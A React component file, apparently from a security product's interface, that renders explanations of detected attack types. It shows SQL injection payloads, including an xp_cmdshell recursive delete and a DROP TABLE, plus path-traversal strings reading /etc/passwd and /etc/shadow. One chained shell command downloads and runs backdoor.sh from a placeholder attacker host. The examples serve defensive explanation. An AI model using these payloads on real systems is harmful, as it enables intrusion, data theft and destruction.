import React from 'react'
import { css, cx } from '@emotion/css'
import { theme } from '@contrast-security-inc/design-system-foundations'
import { theme as deprecatedTheme } from '../../../src/styled'
import { FormattedMessage } from 'react-intl'
import { AttackExampleCodeSnippet } from '../../legacy-design-system/code-snippet/attack-example-code-snippet'
import { AgentLanguage } from '../agent-language'
import { ContrastFormattedMessage } from '../contrast-formatted-message'
import { AttackEventDetails } from './shared'

export const containerStyles = css`
  margin: 1em 0 2em 0;
  word-break: break-word;
`

export const attackHeadingStyles = css`
  font-family: Roboto, primary;
  font-size: 21px;
  color: ${theme.color.neutral100};
  font-weight: ${deprecatedTheme.fontWeights.primary.medium};
  margin-bottom: 0.5em;
`

export const attackDescriptionStyles = css`
  font-family: ${deprecatedTheme.fontFamilies.secondary};
  font-size: 14px;
  font-weight: ${deprecatedTheme.fontWeights.primary.regular};
  color: ${theme.color.neutral100};
`

export const bodyTextStyles = css`
  font-family: ${deprecatedTheme.fontFamilies.secondary};
  font-size: 14px;
  font-weight: ${deprecatedTheme.fontWeights.primary.regular};
  color: ${theme.color.neutral100};
  margin: 1.5em 0;
`

export const examplesHeadingStyles = css`
  font-family: ${deprecatedTheme.fontFamilies.secondary};
  font-size: 14px;
  font-weight: ${deprecatedTheme.fontWeights.primary.bold};
  color: ${theme.color.neutral100};
  margin-bottom: 0.5em;
`

export const taintedStyles = css`
  color: ${theme.color.red50};
`

export const marginTop = css`
  margin-top: 0.5em;
`

export const marginBottom = css`
  margin-bottom: 0.5em;
`

export const codeTextStyles = css`
  font-family: ${deprecatedTheme.fontFamilies.code};
  font-weight: ${deprecatedTheme.fontWeights.primary.regular};
  color: ${theme.color.neutral60};
`

export function getYamlConfigLinkKey(language: AgentLanguage) {
  switch (language) {
    case AgentLanguage.JAVA:
      return 'link_javaConfig'
    case AgentLanguage.DOTNET:
      return 'link_dotnetConfig'
    case AgentLanguage.DOTNET_CORE:
      return 'link_dotnetCoreConfig'
    case AgentLanguage.PYTHON:
      return 'link_pythonConfig'
    case AgentLanguage.PHP:
      return 'link_phpConfig'
    case AgentLanguage.RUBY:
      return 'link_rubyConfig'
    case AgentLanguage.NODE:
      return 'link_nodeConfig'
    default:
      return 'link_yamlConfig'
  }
}

export function DisableDetectionMethod({
  configurationKey,
  language
}: {
  readonly configurationKey: string
  readonly language: string
}) {
  return (
    <ContrastFormattedMessage
      id={getYamlConfigLinkKey(AgentLanguage.fromKey(language))}
    >
      {(yamlConfigLink) => (
        <FormattedMessage id="detail_attackEventExamples_yamlConfigurationFile">
          {(yamlConfigurationFile) => (
            <FormattedMessage
              id="variable_attackEventExamples_eventDetectionMethod"
              values={{
                configurationTemplateLink: (
                  <a
                    className={css`
                      color: ${theme.color.turquoise70} !important;
                    `}
                    href={yamlConfigLink}
                    target="_blank"
                  >
                    {yamlConfigurationFile}
                  </a>
                ),
                configurationKey: (
                  <span className={codeTextStyles}>{configurationKey}</span>
                ),
                configurationValue: (
                  <span className={codeTextStyles}>false</span>
                )
              }}
            />
          )}
        </FormattedMessage>
      )}
    </ContrastFormattedMessage>
  )
}

export interface DetailsExamplesProps {
  readonly language: string
  readonly hideDetectionText?: boolean | undefined
}

export function TautologiesDetailsExamples({
  language,
  hideDetectionText
}: DetailsExamplesProps) {
  return (
    <div className={containerStyles}>
      <div className={attackHeadingStyles}>
        <FormattedMessage id="detail_attackEventFindings_tautologies" />
      </div>
      <div className={attackDescriptionStyles}>
        <FormattedMessage id="detail_attackEventExamples_tautologiesDescription" />
      </div>
      <div className={bodyTextStyles}>
        <div className={examplesHeadingStyles}>
          <FormattedMessage id="title_attackEventDetails_examples" />
        </div>
        <AttackExampleCodeSnippet
          labelClassName={marginBottom}
          labelId="detail_attackEventExamples_tautologiesExample1Title"
        >
          <span>
            select username from users where username=’
            <span className={taintedStyles}>joe@acme.com</span>’ and password=’
            <span className={taintedStyles}>not_real_password' or 1=1--</span>’
          </span>
        </AttackExampleCodeSnippet>
        <FormattedMessage
          id="detail_attackEventExamples_tautologyExample1Explanation"
          children={(message) => <div className={marginTop}>{message}</div>}
        />
      </div>
      <div className={bodyTextStyles}>
        <AttackExampleCodeSnippet
          labelClassName={marginBottom}
          labelId="detail_attackEventExamples_tautologiesExample2Title"
        >
          <span>
            select salary from employees where username=’
            <span className={taintedStyles}>
              joe@acme.com’ or 2 &lt;&gt; 3’#
            </span>
            ’
          </span>
        </AttackExampleCodeSnippet>
        <FormattedMessage
          id="detail_attackEventExamples_tautologyExample2Explanation"
          children={(message) => <div className={marginTop}>{message}</div>}
        />
      </div>
      <div className={bodyTextStyles}>
        <div className={marginBottom}>
          <FormattedMessage id="detail_attackEventExamples_tautologyClosing" />
        </div>
        {!hideDetectionText && (
          <DisableDetectionMethod
            language={language}
            configurationKey="detect_tautologies"
          />
        )}
      </div>
    </div>
  )
}

// The filepath contains the following suspicious element:
export function PathTraversalFileSecurityBypassDetailsExamples() {
  return (
    <div className={containerStyles}>
      <div className={attackHeadingStyles}>
        <FormattedMessage id="variable_attackEventDetails_fileSecurityBypass" />
      </div>
      <FormattedMessage id="detail_attackEventDetails_fileSecurityBypassDescription1" />
      <div className={bodyTextStyles}>
        <div className={examplesHeadingStyles}>
          <FormattedMessage id="title_attackEventDetails_examples" />
        </div>
        <AttackExampleCodeSnippet>
          {`C:\\Windows\\win.ini::$DATA`}
        </AttackExampleCodeSnippet>
        <AttackExampleCodeSnippet>
          {`/etc/passwd\\0.txt (null byte)`}
        </AttackExampleCodeSnippet>
      </div>
      <FormattedMessage id="detail_attackEventDetails_fileSecurityBypassDescription2" />
    </div>
  )
}

export function DangerousFunctionsDetailsExamples({
  language,
  hideDetectionText
}: DetailsExamplesProps) {
  return (
    <div className={containerStyles}>
      <div className={attackHeadingStyles}>
        <FormattedMessage id="detail_attackEventFindings_dangerousFunctions" />
      </div>
      <div className={attackDescriptionStyles}>
        <FormattedMessage id="detail_attackEventExamples_dangerousFunctionsDescription" />
      </div>
      <div className={bodyTextStyles}>
        <div className={examplesHeadingStyles}>
          <FormattedMessage id="title_attackEventDetails_examples" />
        </div>
        <AttackExampleCodeSnippet
          labelClassName={marginBottom}
          labelId="detail_attackEventExamples_dangerousFunctionsExample1Title"
        >
          <span>
            select salary from users where username=’
            <span className={taintedStyles}>
              joe@acme.com’; exec master.xp_cmdshell ‘RM /S /Q C:/’--
            </span>
            ’
          </span>
        </AttackExampleCodeSnippet>
        <FormattedMessage
          id="detail_attackEventExamples_dangerousFunctionsExample1Explanation"
          children={(message) => <div className={marginTop}>{message}</div>}
        />
      </div>
      <div className={bodyTextStyles}>
        <AttackExampleCodeSnippet
          labelClassName={marginBottom}
          labelId="detail_attackEventExamples_dangerousFunctionsExample2Title"
        >
          <span>
            select total from orders where id= ‘
            <span className={taintedStyles}>1’ waitfor delay '00:00:10'--</span>
            ’
          </span>
        </AttackExampleCodeSnippet>
        <FormattedMessage
          id="detail_attackEventExamples_dangerousFunctionsExample2Explanation"
          children={(message) => <div className={marginTop}>{message}</div>}
        />
        <FormattedMessage
          id="detail_attackEventExamples_dangerousFunctionsExample2ExplanationExtended"
          children={(message) => <div className={marginTop}>{message}</div>}
        />
      </div>
      {!hideDetectionText && (
        <div className={bodyTextStyles}>
          <DisableDetectionMethod
            language={language}
            configurationKey="detect_dangerous_functions"
          />
        </div>
      )}
    </div>
  )
}

export function SuspiciousUnionsDetailsExamples({
  language,
  hideDetectionText
}: DetailsExamplesProps) {
  return (
    <div className={containerStyles}>
      <div className={attackHeadingStyles}>
        <FormattedMessage id="detail_attackEventFindings_suspiciousUnions" />
      </div>
      <div className={attackDescriptionStyles}>
        <FormattedMessage id="detail_attackEventExamples_suspiciousUnionsDescription" />
      </div>
      <div className={bodyTextStyles}>
        <div className={examplesHeadingStyles}>
          <FormattedMessage id="title_attackEventDetails_examples" />
        </div>
        <FormattedMessage
          id="detail_attackEventExamples_suspiciousUnionsExampleDescription"
          children={(message) => <div className={marginBottom}>{message}</div>}
        />
        <AttackExampleCodeSnippet
          labelClassName={marginBottom}
          labelId="detail_attackEventExamples_suspiciousUnionsExampleTitle"
        >
          <span>
            select user_email from orders where total &gt;
            <span className={taintedStyles}>
              {' '}
              60 union select table_name from information_schema.tables limit
              1;#
            </span>
          </span>
        </AttackExampleCodeSnippet>
        <FormattedMessage
          id="detail_attackEventExamples_suspiciousUnionsExampleExplanation"
          children={(message) => <div className={marginTop}>{message}</div>}
        />
      </div>
      <div className={bodyTextStyles}>
        <div className={marginBottom}>
          <FormattedMessage id="detail_attackEventExamples_suspiciousUnionsClosing" />
        </div>
        {!hideDetectionText && (
          <DisableDetectionMethod
            language={language}
            configurationKey="detect_suspicious_unions"
          />
        )}
      </div>
    </div>
  )
}

export function ChainedQueriesDetailsExamples({
  language,
  hideDetectionText
}: DetailsExamplesProps) {
  return (
    <div className={containerStyles}>
      <div className={attackHeadingStyles}>
        <FormattedMessage id="detail_attackEventFindings_chainedQueries" />
      </div>
      <div className={attackDescriptionStyles}>
        <FormattedMessage id="detail_attackEventExamples_chainedQueriesDescription" />
        <FormattedMessage
          id="detail_attackEventExamples_chainedQueriesDescriptionExtended"
          children={(message) => <div className={marginTop}>{message}</div>}
        />
      </div>
      <div className={bodyTextStyles}>
        <div className={examplesHeadingStyles}>
          <FormattedMessage id="title_attackEventDetails_examples" />
        </div>
        <AttackExampleCodeSnippet
          labelClassName={marginBottom}
          labelId="detail_attackEventExamples_chainedQueriesExampleTitle"
        >
          select total from orders where id=’
          <span className={taintedStyles}>1’; drop table orders;#</span>
          ’;
        </AttackExampleCodeSnippet>
        <FormattedMessage
          id="detail_attackEventExamples_chainedQueriesExampleExplanation"
          children={(message) => <div className={marginTop}>{message}</div>}
        />
      </div>
      <div className={bodyTextStyles}>
        <div className={marginBottom}>
          <FormattedMessage id="detail_attackEventExamples_chainedQueriesClosing" />
        </div>
        {!hideDetectionText && (
          <DisableDetectionMethod
            language={language}
            configurationKey="detect_chained_queries"
          />
        )}
      </div>
    </div>
  )
}

export function ParameterBackdoorsDetailsExamples({
  language,
  hideDetectionText
}: DetailsExamplesProps) {
  return (
    <div className={containerStyles}>
      <div className={attackHeadingStyles}>
        <FormattedMessage id="detail_attackEventFindings_parameterCommandBackdoors" />
      </div>
      <div className={attackDescriptionStyles}>
        <FormattedMessage id="detail_attackEventExamples_parameterCommandBackdoorsDescription" />
      </div>
      {!hideDetectionText && (
        <div className={bodyTextStyles}>
          <DisableDetectionMethod
            language={language}
            configurationKey="detect_parameter_command_backdoors"
          />
        </div>
      )}
    </div>
  )
}

export function ChainedCommandsDetailsExamples({
  language,
  hideDetectionText
}: DetailsExamplesProps) {
  return (
    <div className={containerStyles}>
      <div className={attackHeadingStyles}>
        <FormattedMessage id="detail_attackEventFindings_chainedCommands" />
      </div>
      <div className={attackDescriptionStyles}>
        <FormattedMessage id="detail_attackEventExamples_chainedCommandsDescription" />
        <FormattedMessage
          id="detail_attackEventExamples_chainedCommandsDescriptionExtended"
          children={(message) => <div className={marginTop}>{message}</div>}
        />
      </div>
      <div className={bodyTextStyles}>
        <div className={examplesHeadingStyles}>
          <FormattedMessage id="title_attackEventDetails_examples" />
        </div>
        <AttackExampleCodeSnippet
          labelClassName={marginBottom}
          labelId="detail_attackEventExamples_chainedCommandsExampleTitle"
        >
          <span>
            /bin/sh -c ls /reports_dir_
            <span className={taintedStyles}>
              /userid/125/ &amp;&amp; wget -P /tmp
              http://attacker-website-here/backdoor.sh; chmod +x
              /tmp/backdoor.sh; bash /tmp/backdoor.sh
            </span>
          </span>
        </AttackExampleCodeSnippet>
        <FormattedMessage
          id="detail_attackEventExamples_chainedCommandsExampleExplanation"
          children={(message) => <div className={marginTop}>{message}</div>}
        />
      </div>
      {!hideDetectionText && (
        <div className={bodyTextStyles}>
          <DisableDetectionMethod
            language={language}
            configurationKey="detect_chained_commands"
          />
        </div>
      )}
    </div>
  )
}

export function CustomCodeAccessingSystemFilesDetailsExamples({
  language
}: DetailsExamplesProps) {
  return (
    <div className={containerStyles}>
      <div className={attackHeadingStyles}>
        <FormattedMessage id="detail_attackEventFindings_customCodeAccessingSystemFiles" />
      </div>
      <div className={attackDescriptionStyles}>
        <FormattedMessage id="detail_attackEventExamples_customCodeAccessingSystemFilesDescription" />
      </div>
      <div className={bodyTextStyles}>
        <DisableDetectionMethod
          language={language}
          configurationKey="detect_custom_code_accessing_system_files"
        />
      </div>
    </div>
  )
}

export function CommonFileExploitsDetailsExamples({
  language
}: DetailsExamplesProps) {
  return (
    <div className={containerStyles}>
      <div className={attackHeadingStyles}>
        <FormattedMessage id="detail_attackEventFindings_commonFileExploitsAttack" />
      </div>
      <div className={attackDescriptionStyles}>
        <FormattedMessage id="detail_attackEventExamples_commonFileExploitsDescription" />
      </div>
      <div className={bodyTextStyles}>
        <DisableDetectionMethod
          language={language}
          configurationKey="detect_common_file_exploits"
        />
      </div>
    </div>
  )
}

export function DangerousPathsExploitsDetailsExamples({
  language,
  hideDetectionText
}: DetailsExamplesProps) {
  const EXAMPLE_1_1 = '/etc/passwd'
  const EXAMPLE_1_2 = '//etc/shadow'
  const EXAMPLE_3_1 = '/etc/"passwd"'
  const EXAMPLE_3_2 = "'/etc/passwd'"
  const EXAMPLE_3_3 = '/etc/passwd'
  const EXAMPLE_4 = '/etc/././passwd'
  const EXAMPLE_5 = '/etc///passwd'
  return (
    <div className={containerStyles}>
      <div className={attackHeadingStyles}>
        <FormattedMessage id="detail_attackEventFindings_dangerousPaths" />
      </div>
      <div className={attackDescriptionStyles}>
        <FormattedMessage id="detail_attackEventExamples_dangerousPathsDescription" />
      </div>
      <div className={bodyTextStyles}>
        <AttackExampleCodeSnippet
          labelClassName={marginBottom}
          labelId="detail_attackEventExamples_dangerousPathsExample1"
        >
          <span>
            <div>{EXAMPLE_1_1}</div>
            <div>{EXAMPLE_1_2}</div>
          </span>
        </AttackExampleCodeSnippet>

        <div className={cx(marginBottom, marginTop)}>
          <FormattedMessage id="detail_attackEventExamples_dangerousPathsExample2" />
        </div>
        <AttackExampleCodeSnippet
          labelClassName={cx(marginTop, marginBottom)}
          labelId="detail_attackEventExamples_dangerousPathsExample3"
        >
          <span>
            <div>{EXAMPLE_3_1}</div>
            <div>{EXAMPLE_3_2}</div>
            <div>{EXAMPLE_3_3}</div>
          </span>
        </AttackExampleCodeSnippet>

        <AttackExampleCodeSnippet
          labelClassName={cx(marginTop, marginBottom)}
          labelId="detail_attackEventExamples_dangerousPathsExample4"
        >
          <span>
            <div>{EXAMPLE_4}</div>
          </span>
        </AttackExampleCodeSnippet>

        <AttackExampleCodeSnippet
          labelClassName={cx(marginTop, marginBottom)}
          labelId="detail_attackEventExamples_dangerousPathsExample5"
        >
          <span>
            <div>{EXAMPLE_5}</div>
          </span>
        </AttackExampleCodeSnippet>
        {!hideDetectionText && (
          <div className={marginTop}>
            <DisableDetectionMethod
              language={language}
              configurationKey="detect_common_file_exploits"
            />
          </div>
        )}
      </div>
    </div>
  )
}

export interface ProcessHardeningDetailsProps {
  details: AttackEventDetails
}

export function ProcessHardeningDetailsExamples({
  details
}: ProcessHardeningDetailsProps) {
  const items = [
    {
      title: 'title_attackEvent_commandArguments',
      children: details.commandArgs ? details.commandArgs.join(' ') : undefined
    },
    {
      title: 'title_filesDirectory',
      children: details.directory ? details.directory : undefined
    }
  ]

  return (
    <div className={containerStyles}>
      {items.map((item, index) =>
        item.children ? (
          <div key={index}>
            <FormattedMessage
              id={item.title}
              children={(text) => <>{text}:</>}
            />
            <div
              className={css`
                margin-top: 1em;
                margin-bottom: 1em;
              `}
            >
              <AttackExampleCodeSnippet>
                {item.children}
              </AttackExampleCodeSnippet>
            </div>
          </div>
        ) : undefined
      )}
    </div>
  )
}
